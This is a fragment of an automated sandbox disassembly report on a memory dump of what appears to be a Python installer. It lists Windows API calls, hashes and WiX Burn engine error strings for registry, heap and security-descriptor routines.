                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\regutil.cpp
                                                                                                                                  • API String ID: 71445658-3069916640
                                                                                                                                  • Opcode ID: 8763b96266df5602a5cb9145bfbd404c955a665b89e45ce68e5b5d8089583204
                                                                                                                                  • Instruction ID: 73ae437a15a6354af9a2b7bee447826bfbc49375a150d6a653816cabb05cad48
                                                                                                                                  • Opcode Fuzzy Hash: 8763b96266df5602a5cb9145bfbd404c955a665b89e45ce68e5b5d8089583204
                                                                                                                                  • Instruction Fuzzy Hash: 67F0243A700236A38B3409568C05F6B6E899B83BF0F15402BBE49EB332D528CC1087EC
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00000001,00000000,00000000,?,?,00484D23,?,?,00000001), ref: 0048FA49
                                                                                                                                    • Part of subcall function 004C1571: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004C15E7
                                                                                                                                    • Part of subcall function 004C1571: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 004C161F
                                                                                                                                  Strings
                                                                                                                                  • BundleResumeCommandLine, xrefs: 0048FA1F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID: BundleResumeCommandLine
                                                                                                                                  • API String ID: 1586453840-2494792091
                                                                                                                                  • Opcode ID: 4a3a6d02b4c280f876652397e2cc3ee94ad89bf8cca5b5ad33cc220d8cb4c7bb
                                                                                                                                  • Instruction ID: 4d11853be819fb1b5d45a1832f453d4635e523f68470ad7d60053a3eaffeab59
                                                                                                                                  • Opcode Fuzzy Hash: 4a3a6d02b4c280f876652397e2cc3ee94ad89bf8cca5b5ad33cc220d8cb4c7bb
                                                                                                                                  • Instruction Fuzzy Hash: 9EF0903A910128FBCB15AA94CD46FDEBA69AB04764F114066F905A7131D2398E54D7C8
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                  • Opcode ID: 4c1c7deeb8a786ffe8ef713738c14b99caa3e31c72039d1481c92963a0b91cf9
                                                                                                                                  • Instruction ID: 92565747903371d893bfa4a248340971325da6e78a975700c20393ee69d05a94
                                                                                                                                  • Opcode Fuzzy Hash: 4c1c7deeb8a786ffe8ef713738c14b99caa3e31c72039d1481c92963a0b91cf9
                                                                                                                                  • Instruction Fuzzy Hash: 5AC012321A020DAB8B406FF8EC0EC8A3BACEB28602B048420B916C3150CB38E0148BA4
                                                                                                                                  APIs
                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00498BB5,0000001C,80070490,00000000,00000000,80070490), ref: 004835F3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1514166925-0
                                                                                                                                  • Opcode ID: 7e23c6bf988dd53a6f4ebb4b8f467daccd59bd74077088e487135b4f0bed4a7b
                                                                                                                                  • Instruction ID: 6fa9efbfd3dcbf09efed3c735d04a512994ee89293a8cc06be01d6c02411d99e
                                                                                                                                  • Opcode Fuzzy Hash: 7e23c6bf988dd53a6f4ebb4b8f467daccd59bd74077088e487135b4f0bed4a7b
                                                                                                                                  • Instruction Fuzzy Hash: 17E012722011257BEB013FA6AD02DAF7F5CDF05755B104816FE40E6110D669DA1087BC
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,004855E6,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C338E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: 29122bfc2c610aad640e4e4038e021082656a331f65fcd0f3d3e0d3a515caf89
                                                                                                                                  • Instruction ID: a3dde33da357b4a5d5e6b744d811e3e0c042f100358af153dff6d41cd2391a67
                                                                                                                                  • Opcode Fuzzy Hash: 29122bfc2c610aad640e4e4038e021082656a331f65fcd0f3d3e0d3a515caf89
                                                                                                                                  • Instruction Fuzzy Hash: 6DE0F6B29613B69A97409F69BDC59417BA8FB09A42301522BFA10DA222C7B044829FD8
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 004BF890
                                                                                                                                    • Part of subcall function 004C9CCB: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004C9D3E
                                                                                                                                    • Part of subcall function 004C9CCB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004C9D4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: a3b84cfc0d55cbd6cd30894194f9303e357fe01d9813a6f931323c82a8ee798f
                                                                                                                                  • Instruction ID: adf716e5f0f91538c1afbccb398dada6a82223b54a4cd7695371f429de9fe333
                                                                                                                                  • Opcode Fuzzy Hash: a3b84cfc0d55cbd6cd30894194f9303e357fe01d9813a6f931323c82a8ee798f
                                                                                                                                  • Instruction Fuzzy Hash: 88B012953B80407C360821432D06D37010DC2E0F13330C13FF408C0041EB4C0C06003E
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 004BF890
                                                                                                                                    • Part of subcall function 004C9CCB: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004C9D3E
                                                                                                                                    • Part of subcall function 004C9CCB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004C9D4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: d657cd7858154cad4a434848f8708cff0da26e282057551f116adbd1d09666c9
                                                                                                                                  • Instruction ID: a34927372a81c560d78110962cfc161a576dedeb402e19e99a025a0f2be41695
                                                                                                                                  • Opcode Fuzzy Hash: d657cd7858154cad4a434848f8708cff0da26e282057551f116adbd1d09666c9
                                                                                                                                  • Instruction Fuzzy Hash: 35B012953680407C364861472E06E37014EC2C4F12330C03FF008C1141DF4C0C07003E
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 004BF890
                                                                                                                                    • Part of subcall function 004C9CCB: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004C9D3E
                                                                                                                                    • Part of subcall function 004C9CCB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004C9D4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 01ea845845b837e36c62fdae05e6c88f2ef8171e6c62c74a63f6358fc6fa6180
                                                                                                                                  • Instruction ID: 2a9a048b6f41b921c1dcac207280b0452b6e54381ec19db658b04a318e76d381
                                                                                                                                  • Opcode Fuzzy Hash: 01ea845845b837e36c62fdae05e6c88f2ef8171e6c62c74a63f6358fc6fa6180
                                                                                                                                  • Instruction Fuzzy Hash: BCB012953681407C364861473D06E37014DC2C4F22330C13FF008C1141DB4C0C46013E
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 004C99FD
                                                                                                                                    • Part of subcall function 004C9CCB: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004C9D3E
                                                                                                                                    • Part of subcall function 004C9CCB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004C9D4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 77059c585904d2a606a07ff315f839536ef2c1ef0540a84337e43d9ded0800f5
                                                                                                                                  • Instruction ID: 8e4d298dcbf293d09a0f8001c1a5dcb60ab8898438b5c468d52f5fa6b6cf6b75
                                                                                                                                  • Opcode Fuzzy Hash: 77059c585904d2a606a07ff315f839536ef2c1ef0540a84337e43d9ded0800f5
                                                                                                                                  • Instruction Fuzzy Hash: E7B012DA358146BC3B4462431D8EE37011CD3C0F12330892FF405C0185EE4C4C42103F
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 004C99FD
                                                                                                                                    • Part of subcall function 004C9CCB: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004C9D3E
                                                                                                                                    • Part of subcall function 004C9CCB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004C9D4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 81302d68c26ffe4e61b16a1e85db07aaca69963bf02a95e5e4ebddf84a681ea7
                                                                                                                                  • Instruction ID: 623e2efeb2eeae1eec8fc4c40b37624e40bec556e06773b16ab1afb0c9b107f1
                                                                                                                                  • Opcode Fuzzy Hash: 81302d68c26ffe4e61b16a1e85db07aaca69963bf02a95e5e4ebddf84a681ea7
                                                                                                                                  • Instruction Fuzzy Hash: 7FB092996690407C2A84A246190AE36015CC280B12330C52FB808C1285EA484C06103E
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 004C99FD
                                                                                                                                    • Part of subcall function 004C9CCB: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004C9D3E
                                                                                                                                    • Part of subcall function 004C9CCB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004C9D4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 642d3383eb2904cfbc0caa31ea6f2efc2a620a2c01b3627deb5700894c654431
                                                                                                                                  • Instruction ID: 743c5d3a6cfd0a49b8070ed82386aece859f0d090053bd1718a91586c2c1d9a7
                                                                                                                                  • Opcode Fuzzy Hash: 642d3383eb2904cfbc0caa31ea6f2efc2a620a2c01b3627deb5700894c654431
                                                                                                                                  • Instruction Fuzzy Hash: 1DB092D92582407C2A84A2462A4AE37015CC280B12330892FB408C1295DA484C02103E
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,004822DC,?,00000000,?,00000000,?,004839E0,00000000,?,00000104), ref: 004814DC
                                                                                                                                    • Part of subcall function 00483C9A: GetProcessHeap.KERNEL32(00000000,000001C7,?,00482300,000001C7,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483CA2
                                                                                                                                    • Part of subcall function 00483C9A: HeapSize.KERNEL32(00000000,?,00482300,000001C7,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483CA9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$ProcessSizelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3492610842-0
                                                                                                                                  • Opcode ID: 5bfc45de7ba999e60a85a918b7c4fb6fe899740f4f573bc150b72f6d3734325b
                                                                                                                                  • Instruction ID: 48c03a95275a0e6362e722b7d107a215c731d676115e7e0db303b1592c2d9612
                                                                                                                                  • Opcode Fuzzy Hash: 5bfc45de7ba999e60a85a918b7c4fb6fe899740f4f573bc150b72f6d3734325b
                                                                                                                                  • Instruction Fuzzy Hash: BA01F5321001247BCF117E15DC84FCF7B6DEB41B64F114917FE056B160C734980287A8
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,?,00485655,00000000,?,?,?,?), ref: 004C0558
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                  • Opcode ID: a124d5ee29d93873aaccc353a2f49c2c3ac2f92999ca38439e8d9e401e3b960b
                                                                                                                                  • Instruction ID: 87bf28210a7adda03d43f99867ff211cb5ed64d7adf311fe9f693d3464cbc57a
                                                                                                                                  • Opcode Fuzzy Hash: a124d5ee29d93873aaccc353a2f49c2c3ac2f92999ca38439e8d9e401e3b960b
                                                                                                                                  • Instruction Fuzzy Hash: 4BF03A70600344DBD650EB7A9DC9B1B3398AB10368F18172BE424CA2F2C778D9428A5C
                                                                                                                                  APIs
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 004C1C51
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C1C5B
                                                                                                                                  • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 004C1CA8
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C1CAE
                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 004C1CE8
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C1CEE
                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 004C1D2E
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C1D34
                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 004C1D74
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C1D7A
                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 004C1DBA
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C1DC0
                                                                                                                                  • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 004C1EB1
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 004C1EEB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C1EF5
                                                                                                                                  • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 004C1F2D
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C1F37
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004C1F70
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C1F7A
                                                                                                                                  • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 004C1FB8
                                                                                                                                  • LocalFree.KERNEL32(?), ref: 004C1FCE
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\srputil.cpp, xrefs: 004C1C7C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\srputil.cpp
                                                                                                                                  • API String ID: 267631441-2057723657
                                                                                                                                  • Opcode ID: 0f915c5024668f3280f1f50177f389bbca0f5c9132730a94fd27791ddfd96737
                                                                                                                                  • Instruction ID: cf8de1e0d4eed106c8ff13d032b20cf28d197a9cda2b5958fa43cf167245ce92
                                                                                                                                  • Opcode Fuzzy Hash: 0f915c5024668f3280f1f50177f389bbca0f5c9132730a94fd27791ddfd96737
                                                                                                                                  • Instruction Fuzzy Hash: 14C1737AC41239ABD7608B968C49FDBBAB8AF45710F0101AFE909F7251D7749D408EE8
                                                                                                                                  Strings
                                                                                                                                  • Failed to copy filename for pseudo bundle., xrefs: 004AC216
                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 004AC1BD
                                                                                                                                  • Failed to copy key for pseudo bundle payload., xrefs: 004AC1F2
                                                                                                                                  • Failed to copy repair arguments for related bundle package, xrefs: 004AC3CF
                                                                                                                                  • Failed to copy cache id for pseudo bundle., xrefs: 004AC35E
                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 004AC2AC
                                                                                                                                  • Failed to copy display name for pseudo bundle., xrefs: 004AC54E
                                                                                                                                  • Failed to append relation type to install arguments for related bundle package, xrefs: 004AC3A7
                                                                                                                                  • Failed to copy install arguments for related bundle package, xrefs: 004AC386
                                                                                                                                  • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 004AC443
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\pseudobundle.cpp, xrefs: 004AC178, 004AC1B1, 004AC2A0, 004AC4D1
                                                                                                                                  • Failed to allocate memory for dependency providers., xrefs: 004AC4DD
                                                                                                                                  • Failed to copy key for pseudo bundle., xrefs: 004AC33F
                                                                                                                                  • Failed to copy uninstall arguments for related bundle package, xrefs: 004AC422
                                                                                                                                  • Failed to copy local source path for pseudo bundle., xrefs: 004AC23A
                                                                                                                                  • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 004AC184
                                                                                                                                  • Failed to append relation type to repair arguments for related bundle package, xrefs: 004AC3F0
                                                                                                                                  • -%ls, xrefs: 004AC14F
                                                                                                                                  • Failed to copy download source for pseudo bundle., xrefs: 004AC268
                                                                                                                                  • Failed to copy version for pseudo bundle., xrefs: 004AC52C
